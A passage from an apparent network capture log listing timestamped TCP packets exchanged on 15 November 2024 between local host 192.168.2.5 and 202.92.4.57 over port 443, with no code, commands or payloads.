                                                                                                                                                                                                    Nov 15, 2024 09:00:17.139087915 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.139122009 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.139142990 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.139173985 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.140252113 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.140304089 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.140340090 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.140348911 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.140376091 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.140398026 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.141290903 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.141346931 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.141376019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.141383886 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.141424894 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.141424894 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142215014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142261982 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142292023 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142298937 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142327070 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142349958 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142417908 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142467022 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142497063 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142503977 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142529011 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142549038 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142904997 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142946005 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142976046 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.142983913 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143004894 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143028021 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143512964 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143559933 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143591881 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143599033 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143625975 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143637896 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143687963 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143735886 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143763065 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143769979 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143798113 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.143811941 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144243956 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144283056 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144310951 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144318104 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144346952 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144357920 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144615889 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144659042 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144685984 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144692898 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144737005 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144747019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144788027 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144843102 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144870996 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144879103 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144906998 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.144922972 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.145262003 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.145303011 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.145334959 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.145342112 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.145368099 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.145399094 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152410030 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152448893 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152487040 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152494907 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152520895 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152534962 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152712107 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152760029 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152776003 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152786016 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152817011 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.152827024 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153151035 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153189898 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153218031 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153224945 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153249025 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153274059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153575897 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153624058 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153645992 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153652906 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153676987 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153702021 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.153971910 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154012918 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154041052 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154047966 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154076099 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154090881 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154331923 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154382944 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154413939 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154421091 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154448986 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154470921 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154733896 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154774904 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154799938 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154807091 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154834032 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.154854059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.155446053 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.155492067 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.155515909 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.155523062 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.155551910 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.155565023 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195549965 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195609093 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195647955 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195715904 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195755005 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195766926 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195775032 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195799112 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195830107 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195851088 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195852041 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195878983 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195916891 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.195940018 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.255553007 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.255621910 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.255672932 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.255705118 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.255726099 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.255764961 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.256094933 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.256135941 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.256274939 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.256274939 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.256306887 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.256354094 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.257764101 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.257806063 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.257833958 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.257843971 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.257862091 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.257884026 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.258537054 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.258580923 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.258605957 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.258613110 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.258630991 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.258651018 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259208918 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259257078 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259284019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259290934 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259326935 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259326935 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259680033 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259721994 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259743929 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259752035 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259771109 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.259793043 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260040998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260088921 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260116100 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260123968 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260162115 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260454893 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260498047 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260504007 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260508060 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260536909 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260570049 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260595083 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260790110 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260829926 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260854006 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260860920 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260875940 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.260899067 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261121035 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261168957 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261197090 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261204958 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261219978 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261418104 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261430025 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261483908 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261519909 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261528015 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261543036 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261574030 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261707067 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261754036 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261784077 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261791945 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261806965 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.261841059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.262120962 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.262145996 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.262202978 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.262217999 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.262270927 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269248962 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269275904 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269337893 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269351959 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269402027 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269608974 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269632101 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269681931 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269695997 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.269753933 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270014048 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270035028 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270087004 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270100117 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270150900 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270414114 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270435095 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270489931 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270503044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270558119 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270806074 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270827055 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270876884 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270889044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.270944118 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271173000 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271193027 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271245956 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271260023 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271330118 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271564960 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271584034 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271635056 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271653891 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271678925 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271974087 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.271996975 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272036076 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272056103 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272078991 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272499084 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272538900 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272568941 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272583961 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272612095 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.272631884 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.312494040 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.312551975 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.312652111 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.312721014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.312756062 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.312758923 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.312855959 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.313004017 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.313004017 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.313067913 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.313133001 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.372251987 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.372318029 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.372433901 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.372435093 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.372498989 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.372622013 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.373450041 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.373507977 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.373549938 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.373564959 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.373598099 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.373655081 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.374789953 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.374833107 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.374875069 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.374887943 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:17.374919891 CET49704443192.168.2.5202.92.4.57
